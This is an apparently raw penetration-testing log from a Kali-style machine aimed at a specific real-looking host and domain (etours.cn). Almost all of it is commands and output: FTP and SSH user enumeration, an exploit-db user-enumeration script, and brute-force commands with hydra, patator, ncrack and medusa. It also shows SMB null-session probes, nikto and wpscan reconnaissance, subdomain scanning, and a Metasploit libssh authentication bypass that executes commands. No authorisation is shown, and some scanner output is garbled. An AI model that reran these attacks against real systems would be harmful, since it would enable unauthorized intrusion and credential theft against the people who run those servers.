TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits
HTTP 200 OK
TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits
HTTP 200 OK
TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits
HTTP 200 OK
TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits
HTTP 200 OK
SCAN COMPLETED IN 18.49 S

-------------------------
CHECK ANONYMOUS FTP LOGIN FTP Client for File Traversal
root@blackbox:/usr/share/nmap/scripts# ftp 184.154.192.250

Connected to 184.154.192.250.
220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
Name (184.154.192.250:root):
331 Password required for root
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
download password list from here:
https://github.com/berzerk0/Probable-Wordlists
root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git

root@blackbox:~# cd wordlist/
root@blackbox:~/wordlist# ls
adobe_top100_password.txt passlist.txt router_default_password.md
hydra.restore rdp_passlist.txt ssh_passwd.txt
pass_list.rar README.md usernames.txt
or search locally
user list
/usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
root@blackbox:/opt/patator# locate john.txt

/opt/commix/src/txt/passwords_john.txt
/opt/hacktronian/commix/src/txt/passwords_john.txt
/usr/share/commix/src/txt/passwords_john.txt
ftp-user-enum
root@blackbox:/opt# wget http://pentestmonkey.net/tools/ftp-user-enum/ftp-user-

enum-1.0.tar.gz
root@blackbox:/opt# tar -xzf ftp-user-enum-1.0.tar.gz
root@blackbox:/opt# cd ftp-user-enum-1.0/
root@blackbox:/opt/ftp-user-enum-1.0# cp ftp-user-enum.pl /usr/local/bin/
root@blackbox:/opt/ftp-user-enum-1.0# perl -MCPAN -e shell
cpan[1]> install Getopt::Std
cpan[2]> exit
Lockfile removed.
root@blackbox:/opt/ftp-user-enum-1.0# ls
CHANGELOG COPYING COPYING.GPL ftp-user-enum.pl ftp-user-enum-user-docs.pdf
root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M sol -U
/usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... sol

Worker Processes ......... 5
Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-
users.txt
Target count ............. 1
Username count ........... 34
Target TCP port .......... 21
Query timeout ............ 15 secs
######## Scan started at Wed Jan 22 14:56:54 2020 #########

@184.154.192.250: bee
@184.154.192.250: administrator
backup@184.154.192.250: backup
@184.154.192.250: anonymous
@184.154.192.250: admin
@184.154.192.250: guest
@184.154.192.250: ftp
@184.154.192.250: GUEST
@184.154.192.250: info
@184.154.192.250: mail
@184.154.192.250: mysql
@184.154.192.250: msfadmin
@184.154.192.250: nobody
@184.154.192.250: mailadmin
oracle@184.154.192.250: oracle
@184.154.192.250: owaspbwa
@184.154.192.250: private
@184.154.192.250: postfix
@184.154.192.250: proftpd
@184.154.192.250: postgres
@184.154.192.250: root
@184.154.192.250: public
@184.154.192.250: support
@184.154.192.250: sys
@184.154.192.250: superadmin
@184.154.192.250: systemadmin
@184.154.192.250: system
@184.154.192.250: systemadministrator
@184.154.192.250: test
@184.154.192.250: tomcat
@184.154.192.250: webmaster
@184.154.192.250: user
www-data@184.154.192.250: www-data
Fortimanager_Access@184.154.192.250: Fortimanager_Access
######## Scan completed at Wed Jan 22 14:58:39 2020 #########
34 results.
34 queries in 105 seconds (0.3 queries / sec)
root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M iu -U
----------------------------------------------------------
----------------------------------------------------------
Mode ..................... iu
users.txt
Target count ............. 1

@184.154.192.250: anonymous
@184.154.192.250: admin
@184.154.192.250: bee
@184.154.192.250: ftp
@184.154.192.250: GUEST
@184.154.192.250: guest
@184.154.192.250: info
@184.154.192.250: mail
@184.154.192.250: mailadmin
@184.154.192.250: msfadmin
@184.154.192.250: mysql
@184.154.192.250: nobody
@184.154.192.250: owaspbwa
@184.154.192.250: postfix
@184.154.192.250: postgres
@184.154.192.250: private
@184.154.192.250: proftpd
@184.154.192.250: public
@184.154.192.250: root
@184.154.192.250: superadmin
@184.154.192.250: support
@184.154.192.250: sys
@184.154.192.250: system
@184.154.192.250: systemadmin
@184.154.192.250: test
@184.154.192.250: tomcat
@184.154.192.250: user
@184.154.192.250: webmaster
34 results.
root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -U
----------------------------------------------------------
----------------------------------------------------------
Mode ..................... sol

users.txt
Target count ............. 1

@184.154.192.250: anonymous
@184.154.192.250: admin
@184.154.192.250: bee
@184.154.192.250: ftp
@184.154.192.250: guest
@184.154.192.250: GUEST
@184.154.192.250: info
@184.154.192.250: mail
@184.154.192.250: mailadmin
@184.154.192.250: msfadmin
@184.154.192.250: mysql
@184.154.192.250: nobody
@184.154.192.250: owaspbwa
@184.154.192.250: postfix
@184.154.192.250: postgres
@184.154.192.250: private
@184.154.192.250: proftpd
@184.154.192.250: public
@184.154.192.250: root
@184.154.192.250: superadmin
@184.154.192.250: support
@184.154.192.250: sys
@184.154.192.250: systemadmin
@184.154.192.250: test
@184.154.192.250: tomcat
@184.154.192.250: system
@184.154.192.250: user
@184.154.192.250: webmaster
34 results.
root@blackbox:/opt# git clone https://github.com/lanjelot/patator

root@blackbox:/opt/patator# python patator.py ftp_login --help
root@blackbox:/opt/patator# patator ftp_login host=184.154.192.250 user=admin

password=FILE0 0=/opt/commix/src/txt/passwords_john.txt -x ignore:mesg='Login
incorrect.' -x ignore,reset,retry:code=500
15:03:18 patator INFO - Starting Patator v0.7

(https://github.com/lanjelot/patator) at 2020-01-22 15:03 CST
15:03:18 patator INFO - Progress: 0.0% (0/1) | Speed: 10 r/s | ETC: 15:03:18
(00:00:00 remaining)
15:03:18 patator INFO -
15:03:18 patator INFO - code size time | candidate

| num | mesg
15:03:18 patator INFO -
-----------------------------------------------------------------------------
15:06:01 patator INFO - Hits/Done/Skip/Fail/Size: 0/3108/0/0/3108, Avg: 19 r/s,
Time: 0h 2m 43s
SSH USERS ENUMERATION
root@blackbox:~# locate users | grep users.txt

msf5 > use auxiliary/scanner/ssh/ssh_enumusers

msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 84.154.192.250
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE
USER_FILE => /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
SSH - User 'root' found
https://www.exploit-db.com/exploits/45210
root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 admin

root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 root
SSH BRUTE
use auxiliary/scanner/ssh/ssh_login
msf exploit (ssh_login)>set rhosts 184.154.192.250
msf exploit (ssh_login)>set user_file /root/Desktop/user.txt
msf exploit (ssh_login)>set pass_file /root/Desktop/pass.txt
msf exploit (ssh_login)>exploit
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P
/opt/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
ssh://184.154.192.250 -t 4
patator ssh_login host=184.154.192.250 user=FILE0 0=/root/Desktop/user.txt

password=FILE1 1=/root/Desktop/pass.txt
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 184.154.192.250:22
medusa -h 184.154.192.250 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M

ssh
usernames list
/opt/SecLists/Usernames/top-usernames-shortlist.txt
passwords list
/opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
passwords list combo

/opt/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
root@blackbox:~# ssh_scan -t 184.154.192.250
SSH SCAN
root@blackbox:/opt/smbmap# ssh_scan -t 184.154.192.250

[
{
"ssh_scan_version": "0.0.42",
"ip": "184.154.192.250",
"hostname": "server.etours.cn",
"port": 22,
"server_banner": "SSH-2.0-OpenSSH_4.3",
"ssh_version": 2.0,
"os": "unknown",
"os_cpe": "o:unknown",
"ssh_lib": "openssh",
"ssh_lib_cpe": "a:openssh:openssh:4.3",
"key_algorithms": [
"diffie-hellman-group-exchange-sha1",
"diffie-hellman-group14-sha1",
"diffie-hellman-group1-sha1"
],
"encryption_algorithms_client_to_server": [
"aes128-ctr",
"aes192-ctr",
"aes256-ctr",
"arcfour256",
"arcfour128",
"aes128-cbc",
"3des-cbc",
"blowfish-cbc",
"cast128-cbc",
"aes192-cbc",
"aes256-cbc",
"arcfour",
"rijndael-cbc@lysator.liu.se"
],
"encryption_algorithms_server_to_client": [
"aes128-ctr",
"aes192-ctr",
"aes256-ctr",
"arcfour256",
"arcfour128",
"aes128-cbc",
"3des-cbc",
"blowfish-cbc",
"cast128-cbc",
"aes192-cbc",
"aes256-cbc",
"arcfour",
"rijndael-cbc@lysator.liu.se"
],
"mac_algorithms_client_to_server": [
"hmac-md5",
"hmac-sha1",
"hmac-ripemd160",
"hmac-ripemd160@openssh.com",
"hmac-sha1-96",
"hmac-md5-96"
],
"mac_algorithms_server_to_client": [
"hmac-md5",
"hmac-sha1",
"hmac-ripemd160",
"hmac-ripemd160@openssh.com",
"hmac-sha1-96",
"hmac-md5-96"
],
"compression_algorithms_client_to_server": [
"none",
"zlib@openssh.com"
],
"compression_algorithms_server_to_client": [
"none",
"zlib@openssh.com"
],
"languages_client_to_server": [
],
"languages_server_to_client": [
],
"auth_methods": [
"publickey",
"gssapi-with-mic",
"password"
],
"keys": {
"rsa": {
"raw": "ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA7KnYh43OYzJfoqtaHDqyUUbN3AkmyU4UhmHokahcHmg5okzEqkYX6Iz
LepxU1UgFFCaOMozBF/fU0iibocOidKZZST/13CvcRtaHXCwtZEFii+9NopBk08q7tCu0N6lv1IZKHWvBdI
KalwzHpnwYntpvmPR3Y7tfHtxWpF/lh7TGCzdah1aeuET1P8hp7dGjkt6f07pbf/j/8CjMDp4DLVxRCdSL9
DlZuqMYi0qZMk9g99YCorkQDUO20lHL89zzUXiDBEpEKVsrf9JFMb4/MRLaDQ8sVoBqPQRuFYFQaNgWkHs8
8OrtdV3MpMhaRxLcGcHtkzeAlc5OTAodzWgwxw==",
"length": 2048,
"fingerprints": {
"md5": "48:4f:ba:b1:e8:ae:12:ee:2b:e9:38:87:93:38:5c:4d",
"sha1": "0d:13:d6:24:42:42:85:97:36:3c:b4:57:c9:83:57:0c:12:73:4f:a2",
"sha256":
"a8:0b:2f:13:a4:dd:f2:00:4f:ad:65:e7:18:70:d5:66:60:eb:34:0b:69:f0:b4:d6:b7:0a:03:0
1:37:56:f5:d9"
}
}
},
"dns_keys": [
],
"duplicate_host_key_ips": [
],
"compliance": {
"policy": "Mozilla Modern",
"compliant": false,
"recommendations": [
"Add these key exchange algorithms: curve25519-sha256@libssh.org,ecdh-sha2-
nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-
sha256",
"Add these MAC algorithms: hmac-sha2-512-etm@openssh.com,hmac-sha2-256-
etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-
128@openssh.com",
"Add these encryption ciphers: chacha20-poly1305@openssh.com,aes256-
gcm@openssh.com,aes128-gcm@openssh.com",
"Remove these key exchange algorithms: diffie-hellman-group-exchange-sha1,
diffie-hellman-group14-sha1, diffie-hellman-group1-sha1",
"Remove these MAC algorithms: hmac-md5, hmac-sha1, hmac-ripemd160, hmac-
ripemd160@openssh.com, hmac-sha1-96, hmac-md5-96",
"Remove these encryption ciphers: arcfour256, arcfour128, aes128-cbc, 3des-
cbc, blowfish-cbc, cast128-cbc, aes192-cbc, aes256-cbc, arcfour, rijndael-
cbc@lysator.liu.se",
"Remove these authentication methods: gssapi-with-mic, password"
],
"references": [
"https://wiki.mozilla.org/Security/Guidelines/OpenSSH"
],
"grade": "F"
},
"start_time": "2020-01-22 15:10:54 -0600",
"end_time": "2020-01-22 15:10:57 -0600",
"scan_duration_seconds": 3.036491516
}
]
SMB CHECK
root@blackbox:/opt# git clone https://github.com/ShawnDEvans/smbmap.git

root@blackbox:/opt# cd smbmap/
root@blackbox:/opt/smbmap# python3 -m pip install -r requirements.txt
root@blackbox:/opt/smbmap# python3 smbmap.py -u admin -p admin -d workgroup -H

184.154.192.250
root@blackbox:/opt/smbmap# python3 smbmap.py -u guest -p "" -H 184.154.192.250

Using null session
root@blackbox:/opt/smbmap# python3 smbmap.py -H 184.154.192.250 -r
Guest Session with port specified for Samba
root@blackbox:/opt/smbmap# python3 smbmap.py -u "" -p "" -H 184.154.192.250 -P 139
root@blackbox:/opt/smbmap# python3 smbmap.py -u administrator -p administrator -H

184.154.192.250
root@blackbox:/opt/smbmap# nmap --script smb-vuln* -p 137,139,443,80,22,21

184.154.192.250 --open
Not shown: 2 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
NIKTO CHECK
root@blackbox:/opt# nikto -h etours.cn -C all

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 184.154.192.250
+ Target Hostname: etours.cn
+ Target Port: 80
+ Start Time: 2020-01-23 03:57:53 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://www.etours.cn/
+ Retrieved x-powered-by header: PleskLin
+ Server may leak inodes via ETags, header found with file /6BsxYMU7.pl, inode:
20758719, size: 954, mtime: Wed Sep 14 18:10:28 2011
+ Uncommon header 'link' found, with contents: <http://www.etours.cn/blog/wp-
json/>; rel="https://api.w.org/"
+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 26400 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-01-23 06:12:41 (GMT-6) (8088 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
http://www.etours.cn/blog/wp-json/
root@blackbox:/opt# git clone https://github.com/wpscanteam/wpscan.git

root@blackbox:/opt# cd wpscan
root@blackbox:/opt/wpscan# gem install wpscan
root@blackbox:/opt/wpscan# nano ~/.wpscan/scan.yml
cli_options:
api_token:
root@blackbox:/opt/wpscan# wpscan --url http://www.etours.cn/blog/ --enumerate u1-

100
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team

Version 3.7.7
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://www.etours.cn/blog/

[+] Started: Wed Jan 22 16:15:53 2020
Interesting Finding(s):
[+] http://www.etours.cn/blog/
| Interesting Entries:
| - Server: Apache
| - X-Powered-By: PleskLin
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://www.etours.cn/blog/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://www.etours.cn/blog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://www.etours.cn/blog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).

| Found By: Rss Generator (Passive Detection)
| - http://www.etours.cn/blog/feed/, <generator>https://wordpress.org/?
v=5.1.1</generator>
| - http://www.etours.cn/blog/comments/feed/, <generator>https://wordpress.org/?
v=5.1.1</generator>
|
| [!] 12 vulnerabilities identified:
|
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 5.1.2
| References:
| - https://wpvulndb.com/vulnerabilities/9867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-
maintenance-release/
| -
https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8e
d68
| - https://hackerone.com/reports/339483
|
| [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
| Fixed in: 5.1.2
| References:
| - https://fortiguard.com/zeroday/FG-VD-18-165
| - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-
vulnerability.html
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 5.1.3
| References:
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-
524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.1.3
| References:
| -
https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f
308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-
unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 5.1.3
| References:
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 5.1.3
| References:
| -
https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df3
8de
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL
Validation
| Fixed in: 5.1.3
| References:
| -
https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b0
7b2
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 5.1.3
| References:
| -
https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b
8d0
|
| [!] Title: WordPress <= 5.3 - Improper Access Controls in REST API
| Fixed in: 5.1.4
| References:
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-
g7rg-hchx-c2gw
|
| [!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
| Fixed in: 5.1.4
| References:
| - https://hackerone.com/reports/509930
| - https://github.com/WordPress/wordpress-
develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
xvg2-m2f4-83m7
|
| [!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
| Fixed in: 5.1.4
| References:
pg4x-64rh-3c9v
|
| [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
| Fixed in: 5.1.4
| References:
| - https://github.com/WordPress/wordpress-
develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
[+] WordPress theme in use: twentyeleven

| Location: http://www.etours.cn/blog/wp-content/themes/twentyeleven/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://www.etours.cn/blog/wp-content/themes/twentyeleven/readme.txt
| [!] The version is out of date, the latest version is 3.3
| Style URL: http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css
| Style Name: Twenty Eleven
| Style URI: http://wordpress.org/extend/themes/twentyeleven
| Description: The 2011 theme for WordPress is sophisticated, lightweight, and
adaptable. Make it yours with a cust...
| Author: the WordPress team
| Author URI: http://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css, Match:
'Version: 1.2'
[+] Enumerating Users (via Passive and Aggressive Methods)

Brute Forcing Author IDs - Time: 00:00:18
<==================================================================================
============================> (100 / 100) 100.00% Time: 00:00:18
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK

| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 48
[+] Finished: Wed Jan 22 16:16:42 2020

[+] Requests Done: 140
[+] Cached Requests: 7
[+] Data Sent: 32.334 KB
[+] Data Received: 488.05 KB
[+] Memory used: 138.605 MB
[+] Elapsed time: 00:00:48
http://www.etours.cn/blog/phpinfo.php
Proudly powered by WordPress
http://www.etours.cn/blog/wp-login.php
http://www.etours.cn/blog/
http://www.etours.cn/blog/xmlrpc.php
http://www.etours.cn/blog/readme.html
http://www.etours.cn/blog/wp-cron.php
http://www.etours.cn/blog/wp-content/themes/twentyeleven/
http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
SUBDOMAIN SCAN USING KNOCK
root@blackbox:/# cd /opt/
root@blackbox:/opt# apt-get install python-dnspython
root@blackbox:/opt# git clone https://github.com/guelfoweb/knock.git
root@blackbox:/opt# cd knock
root@blackbox:/opt/knock# leafpad knockpy/config.json
INSERT YOUR VIRUS TOTAL API KEY
root@blackbox:/opt/knock# python setup.py install

root@blackbox:/opt/knock# knockpy etours.cn
_ __ _
| |/ / | | 4.1.1
| ' / _ __ ___ ___| | ___ __ _ _
| < | '_ \ / _ \ / __| |/ / '_ \| | | |
| . \| | | | (_) | (__| <| |_) | |_| |
|_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
| | __/ |
|_| |___/
+ checking for virustotal subdomains: YES

[
"www.etours.cn",
"mail.etours.cn",
"beijing.etours.cn"
]
+ checking for wildcard: NO
+ checking for zonetransfer: NO
+ resolving target: YES
- scanning for subdomain...
Ip Address Status Type Domain Name Server

---------- ------ ---- ----------- ------
184.154.192.250 200 host beijing.etours.cn Apache
184.154.192.250 200 host dns.etours.cn Apache
184.154.192.250 200 host ftp.etours.cn Apache
184.154.192.250 200 host mail.etours.cn Apache
184.154.192.250 302 host webmail.etours.cn Apache
184.154.192.250 200 host www.etours.cn Apache
Check zone transfer for domain name
root@blackbox:/opt/knock# knockpy -r etours.cn
_ __ _
| |/ / | | 4.1.1
| ' / _ __ ___ ___| | ___ __ _ _
| < | '_ \ / _ \ / __| |/ / '_ \| | | |
| . \| | | | (_) | (__| <| |_) | |_| |
|_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
| | __/ |
|_| |___/

[
"www.etours.cn",
"mail.etours.cn",
"beijing.etours.cn"
]
{
"zonetransfer": {
"enabled": false,
"list": []
},
"target": "etours.cn",
"hostname": "etours.cn",
"virustotal": [
"www.etours.cn",
"mail.etours.cn",
"beijing.etours.cn"
],
"alias": [],
"wildcard": {
"detected": {},
"test_target": "flvckazhp.etours.cn",
"enabled": false,
"http_response": {}
},
"ipaddress": [
"184.154.192.250"
],
"response_time": "0.484440803528",
"http_response": {
"status": {
"reason": "Moved Permanently",
"code": 301
},
"http_headers": {
"date": "Wed, 22 Jan 2020 21:40:37 GMT",
"connection": "close",
"content-type": "text/html; charset=iso-8859-1",
"location": "http://www.etours.cn/",
"server": "Apache"
}
}
}
root@blackbox:/opt/knock# knockpy 184.154.192.250
_ __ _
| |/ / | | 4.1.1
| ' / _ __ ___ ___| | ___ __ _ _
| < | '_ \ / _ \ / __| |/ / '_ \| | | |
| . \| | | | (_) | (__| <| |_) | |_| |
|_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
| | __/ |
|_| |___/
+ checking for virustotal subdomains: NO


---------- ------ ---- ----------- ------
knockpy etours.cn
subdomain scan with external wordlist
root@blackbox:/opt/knock# locate subdomains.txt

/opt/SecLists/Discovery/DNS/shubs-subdomains.txt
root@blackbox:/opt/knock# knockpy etours.cn -w

/usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
_ __ _
| |/ / | | 4.1.1
| ' / _ __ ___ ___| | ___ __ _ _
| < | '_ \ / _ \ / __| |/ / '_ \| | | |
| . \| | | | (_) | (__| <| |_) | |_| |
|_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
| | __/ |
|_| |___/

[
"www.etours.cn",
"mail.etours.cn",
"beijing.etours.cn"
]

---------- ------ ---- ----------- ------
184.154.192.250 200 host mbeijing.etours.cneuatmistir Apache
184.154.192.250 200 host edns.etours.cnarelluraggyp.7236.nApache
184.154.192.250 200 host aftp.etours.cnpa.977992.n3s10 Apache
184.154.192.250 200 host 8mail.etours.cnneegrangese-lack.vApache
184.154.192.250 302 host uwebmail.etours.cn-proxy-iossent Apache
184.154.192.250 200 host nwww.etours.cnenor.en Apache
http://184.154.192.250:8880/login_up.php3
https://184.154.192.250:8443/login_up.php3
root@blackbox:~# gobuster dir -u 184.154.192.250 -w

/usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
root@blackbox:~# systemctl status postgresql.service
USE METASPLOIT
root@blackbox:~# cd /opt/metasploit-framework/
root@blackbox:/opt/metasploit-framework# su postgres
postgres@blackbox:/opt/metasploit-framework$ createuser msf_user -P
Enter password for new role: msf
Enter it again: msf
postgres@blackbox:/opt/metasploit-framework$ createdb --owner=msf_user msf_database
postgres@blackbox:/opt/metasploit-framework$ msfconsole
postgres@blackbox:/opt/metasploit-framework$ msfconsole
IIIIII dTb.dTb _.---._

II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.72-dev- ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > db_status

[*] Connected to msf. Connection type: postgresql.
root@blackbox:~# msfconsole
Attempting authentication bypass unpatched libssh
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass

msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 184.154.192.250
rhosts => IPADDRESS
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 830
rport => 830
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
spawn_pty => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1

[*] Starting interaction with 1...
id
uname -a
tty
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute

action => Execute
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
cmd => id; uname -a
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
USE WMAP
msf5 > load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
Clean
msf5 > wmap_sites -l
msf5 > wmap_sites -d 0

msf5 > wmap_targets -c
msf5 > wmap_targets -l
ADD THE SITE
msf5 > wmap_sites -a http://www.etours.cn/

[*] Site created.
msf5 > wmap_sites -l
[*] Available sites
===============
Id Host Vhost Port Proto # Pages # Forms

-- ---- ----- ---- ----- ------- -------
0 184.154.192.250 184.154.192.250 80 http 0 0
ADD THE TARGET
msf5 > wmap_targets -t 184.154.192.250

msf5 > wmap_targets -l
[*] Defined targets
===============
Id Vhost Host Port SSL Path

-- ----- ---- ---- --- ----
0 184.154.192.250 184.154.192.250 80 false /
RUN THE TEST
msf5 > wmap_run -t

[*] Testing target:
[*] Site: 184.154.192.250 (184.154.192.250)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. 2020-01-29 05:09:16 -0600
[*] Loading wmap modules...
[*] 39 wmap enabled modules loaded.
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[*] Module auxiliary/scanner/http/frontpage_login
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/scraper
[*] Module auxiliary/scanner/http/svn_scanner
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] Module auxiliary/scanner/http/webdav_website_content
[*]
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
